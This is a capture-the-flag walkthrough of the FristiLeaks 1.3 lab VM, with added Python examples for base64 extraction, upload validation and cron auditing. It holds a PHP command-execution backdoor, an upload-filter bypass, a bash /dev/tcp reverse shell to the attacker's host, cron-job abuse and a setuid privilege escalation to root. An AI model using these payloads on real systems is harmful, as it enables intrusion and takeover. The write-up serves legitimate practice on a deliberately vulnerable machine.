vulnhub.com fristileaks1.3

host: 192.168.56.1 dhcp-server: 192.168.56.100 kali: 192.168.56.101

* log

  # 2015/12/24 14:45 -> 16:30 (1hr 45min)

  # 2015/12/25 15:00 -> 17:45 (2hr 45min)

  # total time = 4hrs 30min



* discovery - target

  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24

  * found target: 192.168.56.102

  

* discovery - services

  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102

  * found ports: 80



* enumerate port 80

  * wget http://192.168.56.102

  * cat index.html

  * wget http://192.168.56.102/images/keep-calm.png

  * wget http://192.168.56.102/robots.txt

    * robots.txt: disallow /cola /sisi /beer

  * wget http://192.168.56.102/cola/

    * /cola is not the right URL; the hint is that we should drink fristi, so try /fristi

  * wget http://192.168.56.102/fristi/

    * cat index.html

      * read the description meta tag and the comment regarding base64

      * noticed second commented out base64

      * suspect username: eezeepz

    * extracted commented out line using vi

      * deleted other lines

      * joined all lines (:%j)

      * removed spaces (:%s/\ //g)

      * saved into fristi_img2.txt

  * base64 -d fristi_img2.txt > img2

  * file img2

  * mv img2 img2.png

  * suspect password: keKkeKKeKKeKkEkkEk
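The vi steps above (join lines, strip spaces, base64 -d, file) as an added Python example; this is not code from the original notes. It pulls every HTML comment out of a page, keeps the ones that are a single base64 blob, decodes them and sniffs the result by magic bytes; the sample HTML is constructed here, not the real /fristi/ page.

```python
import base64
import binascii
import re

# Leading magic bytes, the same check `file img2` performs.
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg",
         b"GIF87a": "gif", b"GIF89a": "gif"}
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def sniff(blob):
    """Name the blob's type from its first bytes, or 'unknown'."""
    for magic, kind in MAGIC.items():
        if blob.startswith(magic):
            return kind
    return "unknown"

def find_base64_comments(html, min_len=64):
    """Return (kind, data) for each HTML comment that is one base64 blob.

    Whitespace inside the comment is dropped first, which is what the
    ':%j' and ':%s/\\ //g' vi steps did by hand before base64 -d.
    """
    results = []
    for comment in COMMENT_RE.findall(html):
        compact = re.sub(r"\s+", "", comment)
        if len(compact) < min_len or not B64_RE.match(compact):
            continue                     # short or non-base64 comment: skip
        try:
            data = base64.b64decode(compact, validate=True)
        except binascii.Error:
            continue
        results.append((sniff(data), data))
    return results

# Constructed sample page: a PNG header split across lines inside a comment,
# standing in for the commented-out image on /fristi/ (not the real page).
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(range(64))
B64_BLOB = base64.b64encode(FAKE_PNG).decode()
SAMPLE_HTML = ("<html><head><meta name=\"description\" content=\"super leet\"></head>\n"
               "<!-- TODO: remove before release -->\n<!--\n"
               + "\n".join(B64_BLOB[i:i + 40] for i in range(0, len(B64_BLOB), 40))
               + "\n-->\n</html>")

if __name__ == "__main__":
    for kind, data in find_base64_comments(SAMPLE_HTML):
        print(kind, len(data), "bytes")
        with open("img2." + kind, "wb") as fh:   # like `base64 -d ... > img2`
            fh.write(data)
```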



* access

  * http://192.168.56.102/fristi/

  * myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk

  * logged into http://192.168.56.102/fristi/login_success.php

  * clicked upload file link to http://192.168.56.102/fristi/upload.php

  * uploaded img2.png and got message regarding /uploads

  * verified upload location http://192.168.56.102/fristi/uploads/img2.png



* attempted shell access using weevely (failed)

  * generated weevely shell: weevely generate password shell.php

  * cp /usr/share/weevely/shell.php .

  * attempted upload: only allowed png,jpg,gif

  * mv shell.php shell.gif

  * uploaded and connected

  * weevely http://192.168.56.102/fristi/uploads/shell.gif password

  * fixed python dependency issues (PySocks)

    * tar zxvf PySocks-1.5.6.tar.gz

    * cd PySocks-1.5.6/

    * ./setup.py build

    * ./setup.py install

  * weevely http://192.168.56.102/fristi/uploads/shell.gif password

  * unable to connect



* used old script to execute commands

  * renamed to shell.php.jpg

  * uploaded file

  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id

  * uid=48(apache) gid=48(apache) groups=48(apache)
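  Added example, not code from the notes or from the VM: upload.php's source is not shown, so weak_check is an assumed reconstruction of a filter that only looks at the text after the last dot (which is how shell.php.jpg got through and was then handled as PHP), placed beside a stricter validator that rejects double extensions, checks the image's magic bytes and never reuses the client's file name.

```python
import os
import secrets

# Extension -> magic bytes a file with that extension must really start with.
IMAGE_MAGIC = {"png": (b"\x89PNG\r\n\x1a\n",), "jpg": (b"\xff\xd8\xff",),
               "gif": (b"GIF87a", b"GIF89a")}

def weak_check(filename):
    """Assumed reconstruction of the page's upload filter (upload.php's source is
    not on the page): accept whatever ends in an allowed extension.  It passes
    shell.php.jpg, and Apache's AddHandler for .php then runs it as PHP."""
    return filename.lower().rsplit(".", 1)[-1] in IMAGE_MAGIC

def strict_check(filename, content):
    """Return (accepted, stored_name_or_reason).

    One extension only, the bytes must match that image type, and the client's
    name is never reused.  Serve the upload directory with PHP execution
    disabled as well (no AddHandler / php_admin_flag engine off there); this
    check alone is not the whole defence.
    """
    parts = os.path.basename(filename).split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "name must be one base name plus one extension"
    ext = {"jpeg": "jpg"}.get(parts[1].lower(), parts[1].lower())
    if ext not in IMAGE_MAGIC:
        return False, "extension not allowed"
    if not content.startswith(IMAGE_MAGIC[ext]):
        return False, "content is not a %s image" % ext
    return True, "%s.%s" % (secrets.token_hex(8), ext)   # server-chosen name

# Constructed inputs mirroring the page's uploads (not the real files).
BACKDOOR = b"<?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);} ?>"
REAL_PNG = b"\x89PNG\r\n\x1a\n" + bytes(32)

if __name__ == "__main__":
    for name, data in [("shell.php.jpg", BACKDOOR), ("shell.gif", BACKDOOR),
                       ("img2.png", REAL_PNG)]:
        print(name, "weak:", weak_check(name), "strict:", strict_check(name, data))
```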

  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"

  * found: eezeepz, admin, fristigod, fristi

  * ls -l /home/

  * found: drwx---r-x. on eezeepz

  * ls -l /home/eezeepz

  * found: 

    * notes.txt

    * commands (various)

  * cat /home/eezeepz/notes.txt

  * found: 

    * cron runs /tmp/runthis with admin privileges every minute

    * commands chmod, df, cat, echo, ps, grep, egrep in /home/admin

    * access to /usr/bin/*

  * changed access to /home/admin

    * curl http://192s/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"
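  Added example (not from the notes): a small audit of /etc/crontab-style entries that flags the pattern notes.txt describes, a scheduled job whose executable sits in /tmp or another place an unprivileged user can rewrite; the crontab text is constructed here, not the VM's real file.

```python
import os
import shlex
import stat

# Constructed /etc/crontab-style text standing in for the job notes.txt describes
# (runs /tmp/runthis as admin every minute); not the VM's real crontab.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
# m h dom mon dow user command
*/10 * * * * root /usr/lib64/sa/sa1 1 1
* * * * * admin /tmp/runthis
0 3 * * * root /usr/local/sbin/backup.sh
"""
# Anything launched from here can be replaced by any local user.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab or /etc/cron.d syntax."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # comments and SHELL=/PATH=/MAILTO= lines
        fields = line.split(None, 6)      # m h dom mon dow user command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs

def writable_by_others(path):
    """True if non-owners may modify the file, or swap it via its parent dir."""
    bad = stat.S_IWGRP | stat.S_IWOTH
    for candidate in (path, os.path.dirname(path) or "/"):
        try:
            if os.stat(candidate).st_mode & bad:
                return True
        except FileNotFoundError:
            pass
    return False

def audit(text, check_fs=False):
    """Flag jobs whose executable lives where an unprivileged user controls it."""
    findings = []
    for user, command in parse_system_crontab(text):
        exe = shlex.split(command)[0]
        if exe.startswith(UNTRUSTED_DIRS):
            findings.append((user, exe, "executable in world-writable temp dir"))
        elif check_fs and writable_by_others(exe):
            findings.append((user, exe, "executable or its directory writable by others"))
    return findings
```

  On a live host, pass the contents of /etc/crontab (and each file in /etc/cron.d) to audit() with check_fs=True so the permission check runs against the real files.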

  * ls -las /home/admin/

  * found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owned by fristigod)

  * cat /home/admin/whoisyourgodnow.txt

  * found: =RFn0AKnlMHMPIzpyuTI0ITG

  * cat /home/admin/cryptedpass.txt

  * found: mVGZ3O3omkJLmy2pcuTq

  * cat /home/admin/cryptpass.py

  * found:

    * function base64-encodes the input, reverses the result, then applies rot13 (see decryptpass.py in the appendix)

  * created own script to decrypt password

  * python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq

  * found: thisisalsopw123

  * python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG

  * found: LetThereBeFristi!

 

* interactive shell

  * got tired of using the php script and decided to get interactive shell

  * on kali: nc -n -vvv -l -p 80

  * ran via php: /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, but encoded for url as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261

  * now have shell (without TTY, so cannot use su yet)

  * find files owned by users

    * find / -user eezeepz 2>&1 | grep -v "Permission denied"

    * find / -user admin 2>&1 | grep -v "Permission denied"

    * find / -user fristi 2>&1 | grep -v "Permission denied"

    * find / -user fristigod 2>&1 | grep -v "Permission denied"

      * found: /var/fristigod

    * found: empty mailboxes

    * found: /var/www/notes.txt 

      * not very useful since we already figured this out

  * tried to get tty shell 

    // https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells

    // http://netsec.ws/?p=337

  * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'

  * used: su fristigod and password: LetThereBeFristi!

  * cd /var/fristigod

  * ls -las 

  * found: .bash_history and .secret_admin_stuff

  * cat .bash_history

  * found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

  * ls -las /var/fristigod/.secret_admin_stuff/

  * found: setuid/setgid bits set on doCom, owned by root:root

  * file /var/fristigod/.secret_admin_stuff/doCom

  * strings /var/fristigod/.secret_admin_stuff/doCom

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

  * found: Usage: ./program_name terminal_command ...

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id

  * found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash

  !! got root !!

  * found: /root/fristileaks_secrets.txt

  * cat /root/fristileaks_secrets.txt

  * found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1



* other

* /root/.c has source for doCom

* cat /root/.mysql_history

  



* appendix

// http://snipplr.com/view/72936/simple-php-backdoor-shell/

-- start of old script --
<?php
// runs whatever arrives in the cmd parameter (GET or POST) through system();
// the command's output is written straight into the response
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>
-- end of old script --





// modified cryptpass.py script

-- start of decryptpass.py script --
import base64, codecs, sys

# The original cryptpass.py direction, kept for reference: base64-encode,
# reverse the string, then rot13 it (adjusted here for Python 3 str/bytes).
#def encodeString(s):
#    base64string = base64.b64encode(s.encode()).decode()
#    return codecs.encode(base64string[::-1], 'rot13')

def decodeString(s):
    # undo the steps: rot13 is its own inverse and commutes with reversal,
    # so reverse, rot13, then base64-decode
    rottedString = codecs.encode(s[::-1], 'rot13')
    return base64.b64decode(rottedString).decode()

decryptedResult = decodeString(sys.argv[1])
print(decryptedResult)
-- end of decryptpass.py script --
